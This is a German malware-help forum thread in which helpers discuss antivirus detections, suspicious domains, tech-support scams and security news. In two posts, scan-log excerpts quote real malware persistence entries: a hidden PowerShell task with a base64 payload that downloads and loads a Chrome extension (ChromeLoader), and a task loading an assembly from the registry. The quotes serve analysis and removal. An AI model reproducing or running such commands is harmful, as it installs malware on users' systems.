Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Diskussionsforum (https://www.trojaner-board.de/diskussionsforum/)
-   -   Hinweise zu Ad/Malware Threads (bitte offen lassen) (https://www.trojaner-board.de/196393-hinweise-ad-malware-threads-bitte-offen-lassen.html)

Yatagan 18.06.2021 17:33

Zu: https://www.trojaner-board.de/202053...ml#post1754321

Der Speicherort der Bilddateien sollte auffindbar sein:
https://www.sony.de/electronics/supp...icles/00049630

Oder sie liegen in der Sony Cloud.

webwatcher 18.06.2021 17:45

Zitat:

Wählen Sie den Ordner, in dem Sie die Videos und Fotos speichern möchten.
=d.h. in Zukunft

Frage ist, wie/ob bereits existierende Files verschoben/kopiert werden können,
da es anscheinend ein proprietäres Dateiformat ist.

Yatagan 18.06.2021 18:43

Zitat:

Zitat von webwatcher (Beitrag 1754323)
=d.h. in Zukunft

Es wird einen Default-Ordner geben, in den standardmäßig gespeichert wird. Der entsprechende Pfad sollte bereits als Zielverzeichnis hinterlegt sein und könnte auf die geschilderte Art und Weise auszulesen sein.
Inzwischen scheint der TO seine Daten ja gefunden zu haben, wenn er sie schon kopiert...

webwatcher 19.06.2021 13:33

Nochmal zu ligafaktur: hat mir keine Ruhe gelassen und hab es deshalb mit Malwarebytes
gescannt und siehe da: auch mbam klassifiziert es als Malware
Irgendwas ist da oberfaul. Vielleicht hat ihm jemand ein faules Ei ins Nest gelegt.
Auf jeden Fall, so wie es z.Z aussieht: Finger weg und ab in die Tonne :daumenrunter:

Hab ihm das Ergebnis gemailt. Ist jetzt an ihm, ob/was er weiter unternehmen will.

webwatcher 21.06.2021 16:38

Defender hatte die *.exe als "Worm:Win32/Aicat.A!ml" erkannt.
Ist von Microsoft aus der Erkennung rausgenommen.
https://share-your-photo.com/1e110e8d23

webwatcher 15.07.2021 16:14

Falls sich jemand noch wundern sollte, warum Otto Normalo 3 Party AV einsetzt:
https://www.pcwelt.de/produkte/So_gu...t-8989347.html

Das wichtigste wird völlig unter den Tisch gekehrt: Unversehrtheit von Windows

webwatcher 19.07.2021 10:41

Ein der besten Kommentare zum Crash in Anhalt -Bitterfeld> https://heise.de/-6141330


https://www.heise.de/forum/heise-onl...39289697/show/
Zitat:

Wobei ich anmerken möchte, dass das Management mit den Prämissen sehr unzufrieden war und das Problem auch erst nach sehr langen Erläuterungen verstanden hat. Es ist immer noch sehr unzufrieden, weil es eigentlich eine Wiederherstellung per Knopfdruck erwartet und sich darin auch durch - imho verantwortungslose - Produktwerbung auch bestärkt sieht.
Das läuft jetzt also nur deshalb so, weil sie keine Gegenmeinung eines Fachmanns dazu auftreiben konnten und die wiederholte Medienberichterstattung zu wochenlangen Ausfällen einen noch schlechteren Zeitablauf zeichnet, als er so realisiert werden kann.
Allerdings war es schwer, gegen das Vorurteil anzukommen, dass alle Betroffenen mit langen Ausfallzeiten nur Vollidioten sind, die kein Sicherungssystem bedienen können. Die Absurdität dieser Annahme hält die Leute ja nicht davon ab, sie trotzdem für valide zu erklären. Sonst müsste man sich ja echte Sorgen machen und das will man nicht.
https://heise.de/-6141310
Zitat:

Doch die Gefahr steige. Einigen Firmen müsse man die Dringlichkeit nach wie vor klarmachen.

"Es ist unmöglich, sich zu 100 Prozent zu schützen", räumt der VDMA-Experte ein. "Getroffen werden kann jeder, so wie jedes Immunsystem von einem Virus getroffen werden kann. Das gestiegene Bewusstsein muss aber auch zu Investitionen in mehr Sicherheit führen." Oft reagierten Unternehmen erst, wenn Hacker ihr Chaos schon angerichtet hätten und man nur noch reagieren könne. "Thema Nummer eins für die Maschinenbau-Branche ist jetzt die Cybersicherheit."
...
...
"Wir bewegen uns in einer Welt trügerischer Sicherheit", heißt es beim Niedersächsischen Städte- und Gemeindebund. "Auf Dauer hilft es uns nur, wenn wir wichtige Dinge in abgeschotteten Systemen bearbeiten."

Z., in dessen Verband sich Firmen zu einem Arbeitskreis gegen Netz-Erpressungen zusammengeschlossen haben, sieht das Kernproblem so: "Die Leichtsinnigkeit ist immer noch ein schwieriges Feld."

webwatcher 21.10.2021 09:41

https://www.zeit.de/digital/2021-10/...hackerangriffe

Zitat:

BSI-Lagebericht 2021: Kritische Infrastruktur
Angreifer legen Krankenhäuser oder Verwaltungen lahm und gehen dabei immer professioneller vor. Die Bedrohung in Deutschland wächst, zeigt der Lagebericht des BSI.
Und die Türen weiter sperrangelweit offen: :stirn:

IT-Sicherheit ist viiiel zu teuer :rolleyes:

https://www.heise.de/news/IT-Sicherh...eitrag.beitrag
Zitat:

IT-Sicherheit: BSI warnt vor "Alarmstufe Rot"

Die Gesellschaft müsse angesichts anhaltender Bedrohungen etwa durch Ransomware und IT-Schwachstellen "wachsam und wehrhaft sein", fordert das BSI.

webwatcher 22.10.2021 14:27

TrojanDownloader:O97M/EncDoc.RDU!MTB
 
https://www.trojaner-board.de/202881...ml#post1758433
Zitat:

Vielleicht handelt es sich bei der Meldung von WD auch um einen Fehlalarm. Und selbst wenn nicht, sonst ist da nichts zu sehen.
https://www.microsoft.com/en-us/wdsi...tID=2147753610
Zitat:

TrojanDownloader:O97M/EncDoc.RDU!MTB

Microsoft Defender Antivirus detects and removes this threat.

This threat downloads and installs other programs, including other malware, onto your PC without your consent.
Vom blauen Himmel wird der wohl kaum auf den PC gelangt sein...

cosinus 22.10.2021 20:51

Zitat:

Zitat von webwatcher (Beitrag 1758437)
Vom blauen Himmel wird der wohl kaum auf den PC gelangt sein...

Was sollen wir denn jetzt mit so einem Kommentar anfangen? :wtf:
Niemand kann da eine 100%ige Aussage zu machen. Ich hätte jetzt den TO gefragt woher er diese Datei hat und zu was die gut ist (war!) aber die meisten wissen das ja nicht. Oder sagen dann, dass sie die schon ewig drauf haben, damit schon immer arbeiten aber dann doch löschen lassen. :kaffee:

webwatcher 22.10.2021 22:15

Wenn sie ihn "ewig" drauf gehabt hätte, sähe der PC vermutlich im Inneren etwas anders aus.
Zitat:

This threat downloads and installs other programs, including other malware, onto your PC without your consent.
Hat eben großes Glück gehabt, dass der Defender angeschlagen hat.

cosinus 22.10.2021 22:20

Aber wenn die Leute damit arbeiten, dann doch weil sie so eine Datei selbst erstellen und/oder mit Leben füllen. Eigentlich hätte der TO diese Datei zur Verfügung stellen müssen, so bleibt alles unklar!

webwatcher 31.12.2021 16:31

https://www.trojaner-board.de/203241...ml#post1760771
Zitat:

Ich wende mich an euch, weil ich beim PC meiner Eltern, einen komischen Chronik Verlauf gefunden habe.
Ständig ist die Internetseite exsalut.com enthalten. Google liefert keine brauchbaren Ergebnisse und wenn man der Seite in der Chronik folgt, kommt man ins leere.
taucht schon früher im Board und im WWW auf

exsalut.com ist auf amazon registriert
https://stuffgate.com/exsalut.com
Zitat:

Registrar URL: http://registrar.amazon.com
Updated Date: 2020-05-18T12:48:18Z
Creation Date: 2020-05-18T12:37:17Z
Registry Expiry Date: 2021-05-18T12:37:17Z
Wozu die dient, ist unklar. Hab jedenfalls keinen Hinweis/Erklärung dazu gefunden.
Aufruf liefert eine leere Seite.

M-K-D-B 06.01.2022 08:43

Zitat:

Zitat von webwatcher (Beitrag 1760772)
https://www.trojaner-board.de/203241...ml#post1760771

taucht schon früher im Board und im WWW auf

exsalut.com ist auf amazon registriert
https://stuffgate.com/exsalut.com


Wozu die dient, ist unklar. Hab jedenfalls keinen Hinweis/Erklärung dazu gefunden.
Aufruf liefert eine leere Seite.

Analog zu hier.

M-K-D-B 06.01.2022 08:49

Neue Malware (hab ich auch schon bei MB gesehen).

Link zum Thema


Zitat:

Task: {FF650B09-2BA7-407F-AD46-F0DDA995556C} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAA7AAoACgAoAE cAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAALQBGAGkAbAB0AGUAcgAgACIAbgBhAG0AZQA9ACcAYwBoAHIAbwBtAGUALgBlAHgAZQAnACIAKQAg AHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsACgAJAGkAZgAoACQAXwAgAC0ATQ BhAHQAYwBoACAAIgBsAG8AYQBkAC0AZQB4AHQAZQBuAHMAaQBvAG4AIgApAHsACgAJAAkAYgByAGUAYQBrADsACgAJAH0ACgAKAAkAJABpAHMATwBwAGUAbgAgAD0AIAAxADsACgB9AAoACgBpAGYA KAAkAGkAcwBPAHAAZQBuACkAewAKAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAeAB0AFAAYQB0AGgAKQApAHsACgAKAAkACQAkAGEAcgBjAG gAaQB2AGUATgBhAG0AZQAgAD0AIAAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAGEAcgBjAGgAaQB2AGUALgB6AGkAcAAiAAoACgAJAAkAdAByAHkAewAKAAkACQAJ AHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwBiAHIAbwBrAGUAbgBuAGEALgB3AG8AcgBrAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwACIAIAAtAG8AdQB0AGYAaQBsAGUAIAAiACQAYQByAGMAaA BpAHYAZQBOAGEAbQBlACIACgAJAAkAfQBjAGEAdABjAGgAewAKAAkACQAJAGIAcgBlAGEAawAKAAkACQB9AAoACgAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIA YQBsAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAKAAoACQB9AAoACgAJAH QAcgB5AHsACgAJAAkARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAYwBoAHIAbwBtAGUAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAEMAbABvAHMAZQBNAGEAaQBu AFcAaQBuAGQAbwB3ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAfQAKAAkACQBzAHQAYQByAHQAIABjAGgAcgBvAG0AZQAgAC0ALQBsAG8AYQBkAC0AZQB4AHQAZQBuAHMAaQBvAG4APQAiACQAZQ B4AHQAUABhAHQAaAAiACwAIAAtAC0AcgBlAHMAdABvAHIAZQAtAGwAYQBzAHQALQBzAGUAcwBzAGkAbwBuACwAIAAtAC0AbgBvAGUAcgByAGQAaQBhAGwAbwBnAHMALAAgAC0ALQBkAGkAcwBhAGIA bABlAC0AcwBlAHMAcwBpAG8AbgAtAGMAcgBhAHMAaABlAGQALQBiAHUAYgBiAGwAZQAKAAkAfQBjAGEAdABjAGgAewB9AAoACgB9AAoACgA= /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAA7AAoACgAoAE cAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAAL (Der Dateneintrag hat 1683 mehr Zeichen). (Keine Datei) <==== ACHTUNG

CHR Extension: (Settings) - C:\Users\tilmu\AppData\Local [2022-01-05]

C:\Users\tilmu\AppData\Local\chrome

Zitat:

========================= Folder: C:\Users\tilmu\AppData\Local\chrome ========================

2022-01-04 10:51 - 2022-01-04 09:51 - 000010714 ____A [8FD91B4289AF2CAA8006118AA082F7B7] () C:\Users\tilmu\AppData\Local\chrome\background.js
2022-01-04 10:51 - 2022-01-04 09:51 - 000000221 ____A [1B92868D55E896DA6D17BFB900DE92CF] () C:\Users\tilmu\AppData\Local\chrome\conf.js
2022-01-04 10:51 - 2022-01-04 09:51 - 000000484 ____A [A71C82A6FFE68495546E7BB7D3F62A0C] () C:\Users\tilmu\AppData\Local\chrome\manifest.json
2022-01-04 10:51 - 2022-01-04 09:51 - 000003970 ____A [4E46AD8737DD28215F3C478EE8B01DC0] () C:\Users\tilmu\AppData\Local\chrome\settings.png

webwatcher 06.01.2022 15:42

Third party AV ist bekannt als überflüssiges/contraproduktives Schlangenöl. Ein neues Highlight:

https://www.borncity.com/blog/2022/0...-krypto-miner/
Zitat:

[English]Heute noch ein kleiner Beitrag "aus der Gruft", der zeigt, was man sich heutzutage alles mit Software bei der Installation auf die Systeme holen kann. So manches Software-Paket kommt ja auf viele Mega- oder Gigabyte Download-Größe und man fragt sich, was da alles dabei und zur Installation erforderlich ist. Den Vogel schießt die Sicherheits- und Antivirus-Lösung Norton 360 ab, die so ganz nebenbei einen Krypto-Miner auf dem System des Anwenders installiert. Das kann zwar durch den Anwender gesteuert werden, ist aber trotzdem bedenklich. Ich bin zufällig die Tage auf Twitter auf diesen Fall aufmerksam geworden, weil auf die entsprechende FAQ in der Norton-Community hinwiesen wurde.


https://twitter.com/doctorow/status/1478479483585933312
Zitat:

This is fucking wild. Norton "Antivirus" now sneakily installs cryptomining software on your computer, and then SKIMS A COMMISSION.
Zitat:

Zitat von Google Übersetzer
Das ist verdammt wild. Norton "Antivirus" installiert jetzt heimlich Cryptomining-Software auf Ihrem Computer und kassiert dann EINE KOMMISSION.


M-K-D-B 06.01.2022 16:28

Wie gestört ist das denn... :crazy::headbang:

Bin gespannt, ob noch andere AV-Hersteller auf diesen Zug aufspringen...

schlawack 06.01.2022 19:15

Hier wird das auch erwähnt: https://www.borncity.com/blog/2022/01/06/krass-norton-360-installiert-krypto-miner/#more-261223

webwatcher 06.01.2022 19:58

Ach was, schon mal mein obiges Posting von Anfang an gelesen?

https://www.heise.de/news/Norton-Cry...e-6061292.html

schlawack 06.01.2022 20:17

Ich hab davon woanders gelesen, in einem anderen Forum: https://pc-sicherheit.net/viewtopic.php?f=23&t=15988

cosinus 11.01.2022 07:51

Zitat:

Zitat von M-K-D-B (Beitrag 1761029)
Wie gestört ist das denn... :crazy::headbang:

Bin gespannt, ob noch andere AV-Hersteller auf diesen Zug aufspringen...


Hat ja nicht lange gedauert :uglyhammer:
und natürlich ist es....TATAAA....AVIRA ! :rofl:

M-K-D-B 11.01.2022 14:55

Zitat:

Zitat von cosinus (Beitrag 1761276)

Hat ja nicht lange gedauert :uglyhammer:
und natürlich ist es....TATAAA....AVIRA ! :rofl:

Avira/Avast/AVG/Norton ist ja alles ein Verein... :blabla:
Kannst also davon ausgehen, dass die anderen das auch noch "spendiert" bekommen.

Oder gehört da noch was dazu?


Und das wirklich Schlimme ist ja, dass es sehr viele naive Menschen gibt, die wirklich daran glauben, dass die damit reales Geld erwirtschaften können, so dass man davon leben kann. :headbang: :stirn:

webwatcher 11.01.2022 16:26

https://www.golem.de/news/mobile-coi...01-162269.html
Zitat:

Mit Hilfe der neuen Funktion sollen sich Zahlungen in der Kryptowährung genauso einfach verschicken lassen wie etwa die Textnachrichten. Die Technik soll dabei außerdem deutlich mehr Privatsphäre bieten als eine Zahlung über das normale Bankensystem, mit Hilfe von Kreditkarten oder auch über die bekannte Kryptowährung Bitcoin.
....
Die Arbeiten an Mobile Coin begannen vor etwas mehr als vier Jahren. Daran ist auch Signal-Erfinder Moxie Marlinspike selbst beteiligt. Ziel ist es, diese möglichst nutzerfreundlich zu gestalten und die Nachverfolgbarkeit zu erschweren.
Wer ist wohl an so etwas interessiert...

webwatcher 23.01.2022 20:13

Notiz https://www.trojaner-board.de/203376...ml#post1761807

https://praxistipps.chip.de/kmspico-was-ist-das_27495
Zitat:

Nach dem Gesetz dürfen Sie das Tool nicht verwenden, denn Sie umgehen damit den Kopierschutz von Windows.
Für wie doof hält der die Mods?

webwatcher 25.01.2022 10:23

Hab in einem Forum gesehen, in dem von den Mods audacity.de offiziell promotet wurde

Sie haben es mittlerweile erkannt und editiert /gelöscht

Die Seite war von 2003 - ca 2016 übrigens eine echte deutsche Seite und anfangs auch deutsches Forum.
Dann ist die Seite/URL wohl gekapert worden auf welchem Weg auch immer.

Genau das hat Google bis heute nicht mitbekommen.

webwatcher 11.02.2022 11:48

https://www.trojaner-board.de/203489...ml#post1762655
Zitat:

Das audacity und VLC jetzt auch zu den gefährlichen Adressen gehören, ist mir neu. Mit beiden Programmen habe ich jahrelang wunderbar gearbeitet. Alternativ für den VLC könnte ich den mitgelieferten Windows-Player nehmen. Aber bei audacity muss mir erst noch eine Alternative suchen.
Die Hinweise geraten z.T in den falschen Hals. Vielleicht sollte man es noch deutlicher machen, dass es um die Quellen geht und nicht um die Programme.

webwatcher 28.02.2022 17:20

https://www.heise.de/news/Kostenlose...s-6528453.html
Zitat:

Das Deutschland sicher im Netz-Projekt (DsiN) hat offiziell den Startschuss für den Digitalen Führerschein (DiFü) gegeben. Mit rund zwei Monaten Verspätung können sich Bürgerinnen und Bürger auf einer zugehörigen Webseite in die Themengebiete rund um Digitalisierung und Cybersicherheit einlesen und fortbilden. Zudem bietet das Projekt eine Führerscheinprüfung mit drei unterschiedlichen Schwierigkeitsgraden an.
PKW, LKW und Motorrad...
Zitat:

Damit können die Teilnehmerinnen und Teilnehmer Zertifikate ausdrucken, die die digitalen Kompetenzen nachweisen
„Was man schwarz auf weiß besitzt, / kann man getrost nach Hause tragen.“ (bzw faxen....)

https://difü.de/

demnächst hier den Führerschein vorlegen lassen----

webwatcher 04.03.2022 10:02

https://heise.de/-6536765

Zitat:

Viele Firmen und individuelle Nutzer fragen sich angesichts des andauernden bewaffneten Angriffs Russlands auf die Ukraine, ob sie auf ihren Rechnern und Kundensystemen noch ruhigen Gewissens Produkte russischer Hersteller wie Antivirus für Windows oder Mac von Kaspersky Lab einsetzen können. Politiker und Forscher werben in dieser Angelegenheit dafür, das Kind nicht mit dem Bade auszuschütten, aber Vorsicht walten zu lassen.
Von Kapersky wird eh aus den bekannten Gründen abgeraten

M-K-D-B 10.03.2022 17:33

Eine interessante Malware, die ich vor ein paar Tagen aufgegabelt habe... :D

Zitat:

Task: {95ABE0FC-F937-462D-8274-6224CB7C05E6} - System32\Tasks\Vxhyhj => powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\Vxhyh\).hyhxV).EntryPoint.Invoke($Null,$Null)
Die PE-Datei im binären Format als Schlüssel. Originell.

Link

webwatcher 04.05.2022 10:16

https://heise.de/-7071854
Zitat:

Vermeintliche Windows-Sicherheitsupdates haben die Ransomware Magniber installiert. 2600 US-Dollar Lösegeld verlangen die Drahtzieher.
....
Verteilt wurde die als Windows-Update verkleidete Malware auf Warez- und Cracks-Seiten. Fortgeschrittenen IT-lern ist meist bekannt, dass solche Seiten regelmäßig Schadsoftware verbreiten. Unbedarfte Computernutzer fallen jedoch häufiger auf diese Masche herein, weil sie sie schlicht nicht kennen.
Mein Mitleid hält sich in sehr engen Grenzen

PC_User 04.05.2022 10:42

Zitat:

Zitat von webwatcher (Beitrag 1765230)
https://heise.de/-7071854

Mein Mitleid hält sich in sehr engen Grenzen

Dito. Dem ist nix hinzuzufügen.

webwatcher 17.05.2022 10:43

Schlangenöl und "Virenschutz" anschaulich und verständlich erklärt:

https://www.youtube.com/watch?v=ZxzvHXT0NXw&t=1s

in diesem Zusammenhang
https://heise.de/-7092420
Zitat:

Die Kosten der Internetkriminalität liegen für deutsche Unternehmen nach einer Analyse des Spezialversicherers Hiscox auf einem internationalen Spitzenplatz. Der Mittelwert der von Hackern verursachten Schäden lag im vergangenen Jahr hierzulande bei 20.792 Dollar (18.712 Euro), wie Hiscox am Montag in München mitteilte. Damit lagen deutsche Firmen erheblich über dem internationalen Mittelwert von 17.000 Dollar und international auf dem ersten Platz.
Ein Armutszeugnis deutscher IT-Sicherheitskompetenz

https://heise.de/-7096611
Zitat:

IT-Sicherheit: Große Defizite beim Standardschutz in kleinen Firmen

Viele der Mittelständler führen laut "Deutschland sicher im Netz" keine Angriffserkennung gegen Cyberattacken durch, die Hälfte verschlüsselt E-Mails nicht.
Die "Entscheidungsträger" sind oft völlig unbedarft milde ausgedrückt und es kostet halt Geld, daher wird weiter gewurstelt, auch wenn die Gefahr noch so groß ist.

cosinus 18.05.2022 22:00

Zitat:

Zitat von webwatcher (Beitrag 1765477)
Die "Entscheidungsträger" sind oft völlig unbedarft milde ausgedrückt und es kostet halt Geld, daher wird weiter gewurstelt, auch wenn die Gefahr noch so groß ist.

War schon immer so:

- IT ist nur ein Kostenfaktor
- Warum Updates einspielen wir haben Firewall und Virenscanner
- Wenn um SAP oder Microsoft geht spielt Geld meist keine Rolle :applaus:

webwatcher 19.05.2022 07:08

Um einem dringenden Bedürfnis abzuhelfen:

https://news.microsoft.com/de-de/mic...hr-sicherheit/

webwatcher 09.06.2022 15:05

https://www.borncity.com/blog/2022/0...ealer-malware/
Zitat:

Fake CCleaner-Suchergebnisse verlinken auf Malware (Trojaner)

Sicherheit (Pexels, allgemeine Nutzung)[English]Der Piriform CCleaner ist zwar kostenlos, aber es gibt auch eine kostenpflichtige Pro-Version. AVAST hat jetzt eine Malware-Kampagne (FakeCleaner) entdeckt, bei der Cyberkriminelle Suchergebnisse nach einem gecrackten CCleaner Pro so manipuliert haben, dass diese als Malware-Schleuder fungierten. Folgen Nutzer den Links dieser Treffer, laden sie sich eine Malware auf System, die Informationen stiehlt (Trojaner bzw. Information Stealer). Könnte natürlich auch passieren, dass bei einer Suche nach "CCleaner" solche manipulierten Ergebnisse auftauchen.

webwatcher 17.06.2022 13:25

https://heise.de/-7143718
Zitat:

Pfusch, zu langsam, zu intransparent: Kritik an Microsofts Updateverhalten

IT-Sicherheitsunternehmen kritisieren langsame Reaktionen von Microsoft auf Sicherheitslücken. Zudem seien verpfuschte und verschwiegene Updates ein Risiko.
Der Kritiker ist nicht gerade ein Nobody
https://en.wikipedia.org/wiki/Amit_Yoran
Zitat:

Yoran is a graduate of the United States Military Academy and served as one of the founding members of the US Department of Defense's Computer Emergency Response Team. He has a master's degree in computer science

webwatcher 21.06.2022 07:37

Zitat:

domain: COMSS.RU
nserver: liv.ns.cloudflare.com.
nserver: vin.ns.cloudflare.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
registrar: RU-CENTER-RU
admin-contact: https://www.nic.ru/whois
created: 2008-02-13T21:00:00Z
paid-till: 2023-02-13T21:00:00Z
free-date: 2023-03-17
source: TCI
anonym registriert und wie es sich für ein solches "Tool" gehört ohne Impressum
mehr als dubioses Programm, das sich tief ins System eingräbt und praktisch nur durch Neuinstallation komplett beseitigt werden kann.
Hat ein neuregistrierter User in einem Windowsforum an die Oberfläche gezerrt. Platz 38 bei Google
Zitat:

Zitat von Übersetzung
Das Dienstprogramm AutoLogger ist ein automatischer Protokollsammler auf einem Computer zur weiteren Analyse eines infizierten Systems und seiner Wiederherstellung. Alles ist in AVZ-Skripten implementiert und hat eine flexible Struktur von Einstellungen und Dialogen für den Endbenutzer

Die Frage wo er diesen Müll ausgegraben hat, beantwortet er nicht.

webwatcher 26.06.2022 11:43

https://www.trojaner-board.de/204456...ml#post1766376
Zitat:

SettingsModifier:Win32/PossibleHostsFileHijack
vermutlich false positive
https://support.microsoft.com/de-de/...95144521<br />
Zitat:

Hosts file is detected as malware in Windows Defender

In this scenario, the Hosts file is detected as a SettingsModifier:Win32/PossibleHostsFileHijack malware threat by Windows Defender.

This issue occurs because Windows Defender may determine incorrectly that the Hosts file was changed by malware, such as adware or spyware. Typically, malware programs change the Hosts file to redirect users to malicious websites. Therefore, Windows Defender may detect the Hosts file as a security threat.

webwatcher 28.06.2022 16:10

Mittlerweile spricht es sich rum dass der Defender die erste Wahl ist

https://winfuture.de/news,130455.html
Zitat:

Der Microsoft Defender hat mittlerweile einen hervorragenden Ruf und immer mehr Nutzer sparen sich ein zusätzliches Antiviren-Programm, auch aus Leistungsgründen.
https://www.heise.de/news/Deutlich-m...eitrag.beitrag
Zitat:

33,6 Millionen E-Mail-Bedrohungen in Cloud-basierten Systemen wie Microsoft 365 und Google Workspace blockierte das Sicherheitsunternehmen Trend Micro im vergangenen Jahr. Im Vergleich zum Vorjahr bedeutet das einen Anstieg von über 100 Prozent. Noch immer ist damit E-Mail das Haupteinfallstor für Cyberattacken. Das liegt daran, dass Angriffe mit wenig Aufwand und hoher Wirkung ausgeführt werden können
Die größte Gefahr sitzt nach wie vor 30cm vor dem Bildschirm

_698 19.07.2022 23:03

https://www.trojaner-board.de/204704-windows-10-cmd-exe-oeffnet-unregelmaessigen-abstaenden-selber.html#post1766932
Zitat:

Zitat von M-K-D-B
Avira erkennt die Adware nicht.

ChromeLoader, um den es hier geht, ist nicht nur Adware.
Er überträgt auch Suchbegriffe an den/die Angreifer.

M-K-D-B 21.07.2022 16:46

Zitat:

Zitat von _698 (Beitrag 1766938)
ChromeLoader, um den es hier geht (...)

ChromeLoader war damit nicht gemeint. ;)

_698 21.07.2022 20:51

Wenn du das

HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Energy] => C:\Users\chris\AppData\Roaming\Energy\Energy.exe [134333464 2022-05-23] (Energy ltd) [Datei ist nicht signiert] <==== ACHTUNG
(auch Tone, Healthy etc.) meinst:

Das gehört zur ChromeLoader-Infektion.
Bei Bedarf kann ich Samples zur Verfügung stellen, wenn du das nachvollziehen möchtest.

M-K-D-B 22.07.2022 09:48

Für das Analysieren habe ich ehrlich gesagt nicht die Zeit, zudem müsste ich mich da tatsächlich erst einarbeiten.

Ich halte mich bei der Klassifizierung an Analysten, denen ich samples habe zukommen lassen. ;)
Zitat:

Adware.ChromeLoader.Generic, C:\USERS\xxxxx\APPDATA\LOCAL\chrome_panel\background.js, Quarantined
Und wenn du da anderer Meinung bist, dann darfst du das gerne sein. :)
Es kommt gar nicht so selten vor (zumindest was ich bei VT so sehe), dass verschiedene Anti-Malwareprogramme die gleiche Malware unterschiedlich klassfizieren.


Aufspühren, Entfernen und ggf. weiterleiten, das genügt mir. :D

Um die wirklich schwere, zeitintensive Arbeit dürfen sich die Spezialisten vom ResarchTeam kümmern.

_698 23.07.2022 21:38

Für diejenigen, die an den Zusammenhängen interessiert sind:
https://unit42.paloaltonetworks.com/chromeloader-malware/

webwatcher 03.08.2022 11:17

https://www.com-magazin.de/news/sich...e-2787462.html
Zitat:

Hacking ohne große Vorkenntnisse
Hacken als Freizeitsport und Nebenverdienst

https://www.zdf.de/dokumentation/zdf...n-weg-100.html
Sehr interessante Sendung:

Bekannte Einfallstore: Emails und Schlamperei bei der IT-Sicherheit von Unternehmen

webwatcher 24.08.2022 21:36

Zu > https://www.trojaner-board.de/204976...ml#post1767824
Zitat:

Verbale Drohung mit Sperrung
heute morgen folgende "Fehlermeldung":
"Der Zugriff auf diesen Computer wurde aus Sicherheitsgründen gesperrt.
Rufen sie sofort 06106 7059 727 an sonst wird ihr computer gesperrt ?!"
Kuriose Methode von Phishing:
https://de.minitool.com/datenwiederh...nung-fake.html

Zitat:

Wenn Sie ein Popup-Fenster mit der Aufschrift Windows Defender-Sicherheitswarnung und einer Telefonnummer sehen, während Sie mit Ihrem Browser auf Webseiten surfen, sollten Sie den Informationen, die es liefert, nicht trauen. Es handelt sich um eine Art von Windows Defender-Betrug oder Windows Protector-Betrug. MiniTool Software sagt Ihnen, wie Sie ihn vollständig entfernen können.
Zitat:

Rufen sie den Microsft Support an 039426-6439-20
039426 ist Hessen, die Nummer existiert aber es wird nicht angenommen

Kann aber auch nur Verschleierung der Malwareinfektion sein.

CptMw 25.08.2022 13:10

So blöd wird doch wohl niemand sein.

Ich bekomme die letzten Wochen wieder vermehrt Anrufe aus Indien. Schon beim ersten Anzeichen eines indischen Akzents sage ich

Zitat:

AH IS THIS MICROSOFT? ARE THERE VIRUSES OR HACKERS ON MY PC? YOU ARE HERE TO HELP ME, RIGHT? WHAT DO YOU NEED? TEAMVIEWER? ANYDESK?
Mit absichtlich total überzogenem deutschen Akzent. Meist legen die dann auf. Dabei will ich doch nur entgegenkommend sein.

Wenn ich mal wieder mehr Zeit habe, lasse ich die wieder auf meine Windows Server VM und schaue zu. Blöderweise rufen die aber immer mitten in der Arbeitszeit an.

webwatcher 25.08.2022 13:15

Das Kuriose ist hier, dass per Email gedroht wird, man solle eine Nummer anrufen die sogar existiert aber keine Antwort liefert.

M-K-D-B 25.08.2022 18:00

Zitat:

Zitat von CptMw (Beitrag 1767850)
So blöd wird doch wohl niemand sein.

Ich bekomme die letzten Wochen wieder vermehrt Anrufe aus Indien. Schon beim ersten Anzeichen eines indischen Akzents sage ich

Zitat:

AH IS THIS MICROSOFT? ARE THERE VIRUSES OR HACKERS ON MY PC? YOU ARE HERE TO HELP ME, RIGHT? WHAT DO YOU NEED? TEAMVIEWER? ANYDESK?
Mit absichtlich total überzogenem deutschen Akzent. Meist legen die dann auf. Dabei will ich doch nur entgegenkommend sein.

Wenn ich mal wieder mehr Zeit habe, lasse ich die wieder auf meine Windows Server VM und schaue zu. Blöderweise rufen die aber immer mitten in der Arbeitszeit an.

:D :daumenhoc

webwatcher 02.09.2022 10:23

https://www.heise.de/news/Studie-Cyb...eitrag.beitrag
Zitat:

